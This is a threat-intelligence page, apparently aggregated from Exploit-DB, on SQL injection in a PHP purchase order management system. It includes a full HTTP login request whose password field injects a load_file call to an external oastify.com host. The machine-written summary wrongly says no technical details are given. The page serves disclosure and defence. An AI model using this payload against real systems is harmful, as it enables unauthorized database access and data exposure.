POMS oretnom23v1.0 - SQLi vulnerabilities
POMS oretnom23v1.0 contains SQL injection vulnerabilities. These vulnerabilities allow attackers to manipulate database queries, potentially leading to unauthorized data access or modification. No specific affected versions or detailed technical information are provided.
AI Analysis
Technical Summary
The POMS oretnom23v1.0 software has been identified to contain SQL injection (SQLi) vulnerabilities. The available information does not specify the exact nature of the SQLi flaws, affected components, or exploitation methods. No vendor advisory or patch information is provided, and no known exploits in the wild have been reported.
Potential Impact
SQL injection vulnerabilities can allow attackers to interfere with the queries an application makes to its database. This may result in unauthorized data disclosure, data modification, or other database-related impacts. However, without detailed technical data or confirmed exploitation, the precise impact remains generalized.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory or official sources for current remediation guidance. Until a fix is available, avoid exposing vulnerable interfaces to untrusted users and consider implementing input validation or web application firewalls to mitigate SQL injection risks.
Indicators of Compromise
- exploit-code: # Title: POMS oretnom23v1.0 - SQLi vulnerabilities # Author: nu11secur1ty # Date: 10/01/2026 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html # Reference: https://portswigger.net/web-security/sql-injection ## Description: The password parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\ y10in4ofvosyskgb5c9a7e55mwssgkf86bu3hu5j.oastify.com\\ifs'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. STATUS: CRITICAL [+]Payload: ``` POST /purchase_order/classes/Login.php?f=login HTTP/1.1 Host: localhost Cache-Control: max-age=0 Sec-CH-UA: "Chromium";v="151", "Not;A=Brand";v="24", "Google Chrome";v="151" Sec-CH-UA-Mobile: ?0 Sec-CH-UA-Platform: "Windows" Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.0.0 Safari/537.36 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Connection: close Cookie: PHPSESSID=io6v7ltscimb0vv716cvdphifd Origin: http://localhost X-Requested-With: XMLHttpRequest Referer: http://localhost/purchase_order/admin/login.php Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 37 username=YIMivRgy&password=l9V!q9b!X1'%2b(select%20load_file('%5c%5c%5c% 5cy10in4ofvosyskgb5c9a7e55mwssgkf86bu3hu5j.oastify.com%5c%5cifs'))%2b' ``` # Demo: [href]( https://odysee.com/@nu11secur1ty:b/Kousei-the-agressive-frameweork-for-sqlmap:1 ) # Time spent: 01:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
POMS oretnom23v1.0 - SQLi vulnerabilities
Description
POMS oretnom23v1.0 contains SQL injection vulnerabilities. These vulnerabilities allow attackers to manipulate database queries, potentially leading to unauthorized data access or modification. No specific affected versions or detailed technical information are provided.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The POMS oretnom23v1.0 software has been identified to contain SQL injection (SQLi) vulnerabilities. The available information does not specify the exact nature of the SQLi flaws, affected components, or exploitation methods. No vendor advisory or patch information is provided, and no known exploits in the wild have been reported.
Potential Impact
SQL injection vulnerabilities can allow attackers to interfere with the queries an application makes to its database. This may result in unauthorized data disclosure, data modification, or other database-related impacts. However, without detailed technical data or confirmed exploitation, the precise impact remains generalized.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory or official sources for current remediation guidance. Until a fix is available, avoid exposing vulnerable interfaces to untrusted users and consider implementing input validation or web application firewalls to mitigate SQL injection risks.
Technical Details
- Vendor
- https://github.com/oretnom23
- Author
- nu11secur1ty
- Edb Id
- 52684
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for POMS oretnom23v1.0 - SQLi vulnerabilities
# Title: POMS oretnom23v1.0 - SQLi vulnerabilities # Author: nu11secur1ty # Date: 10/01/2026 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html # Reference: https://portswigger.net/web-security/sql-injection ## Description: The password parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\ y10in4ofvosyskgb5c9a7e55mwssgkf86bu3hu5j.oastify.com\\if... (2168 more characters)
Threat ID: 6abed0b3a43b0b3b8904aa65
Added to database: 10/01/2026, 21:29:23 UTC
Last enriched: 10/01/2026, 21:30:08 UTC
Last updated: 10/02/2026, 02:18:48 UTC
Views: 9
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.